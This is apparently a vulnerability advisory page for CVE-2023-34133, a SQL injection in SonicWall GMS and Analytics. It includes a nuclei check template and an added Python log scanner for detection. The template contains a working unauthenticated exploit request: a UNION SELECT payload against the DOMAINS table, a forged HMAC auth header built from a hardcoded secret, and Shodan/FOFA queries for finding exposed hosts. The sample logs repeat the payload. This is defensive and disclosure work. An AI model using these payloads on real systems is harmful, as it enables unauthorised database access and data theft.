Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
PoC code [public]
id: CVE-2023-34133

info:
  name: SonicWall GMS and Analytics - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
  reference:
    - https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
    - https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
    - https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34133
    - http://packetstormsecurity.com/files/174571/Sonicwall-GMS-9.9.9320-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-34133
    cwe-id: CWE-89
    epss-score: 0.86001
    epss-percentile: 0.99345
    cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: sonicwall
    product: analytics
    shodan-query: http.favicon.hash:"-1381126564"
    fofa-query: icon_hash="-1381126564"
  tags: cve2023,cve,sonicwall,sqli,injection,vkev,vuln

variables:
  num: "999999999"
  query: "' union select (select ID from SGMSDB.DOMAINS), '', '', '', '', '', (select MD5({{num}})),'', '', '"
  secret: '?~!@#$%^^()'
  auth: "{{hmac('sha1', query, secret)}}"

http:
  - raw:
      - |
        GET /ws/msw/tenant/{{url_encode(query)}} HTTP/1.1
        Host: {{Hostname}}
        Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}

    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'
# digest: 4a0a004730450220615907f927705d5eb689304ec4be85d6c0663674a40c19d341aa9991d0aabd11022100ae0697af7ba6148b8c048eff6e5d380635eaa3d7f19c713c732d37670343d806:922c64590222798bb761d5b6d8e72950
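
A detection-side counterpart to the template's request, added here as an example (it is not part of the template, nuclei, or any SonicWall code): it scans web access logs for requests to `/ws/msw/tenant/` whose tenant segment carries SQL syntax, including double-encoded payloads. The combined log format, the allowed tenant character set, and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

TENANT_PREFIX = "/ws/msw/tenant/"  # endpoint from the template's request line
# Assumption: real tenant identifiers are short and use only these characters.
BENIGN_TENANT = re.compile(r"[A-Za-z0-9._-]{1,64}")
SQL_TOKENS = re.compile(r"'|\b(?:union|select)\b|--|/\*", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding, e.g. %2527 -> %27 -> '."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None, 'anomalous' or 'sqli' for one access log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    path = decode_fully(m.group(1).split("?", 1)[0])
    if not path.startswith(TENANT_PREFIX):
        return None
    tenant = path[len(TENANT_PREFIX):]
    if BENIGN_TENANT.fullmatch(tenant):
        return None
    return "sqli" if SQL_TOKENS.search(tenant) else "anomalous"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]

# Constructed sample log lines (documentation IP range, invented tenant names).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jul/2023:10:00:01 +0000] "GET /ws/msw/tenant/acme-corp HTTP/1.1" 200 312',
    '192.0.2.44 - - [10/Jul/2023:10:00:07 +0000] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%29%2C%20%27%27 HTTP/1.1" 200 498',
    '192.0.2.44 - - [10/Jul/2023:10:00:09 +0000] "GET /ws/msw/tenant/%2527%2520UNION%2520SELECT%25201 HTTP/1.1" 200 120',
    '192.0.2.10 - - [10/Jul/2023:10:00:12 +0000] "GET /ws/msw/tenant/a%20b HTTP/1.1" 404 0',
    '192.0.2.10 - - [10/Jul/2023:10:00:15 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

Any hit on an unpatched GMS or Analytics host warrants checking the response size and status for that request, since the flaw is reachable without authentication.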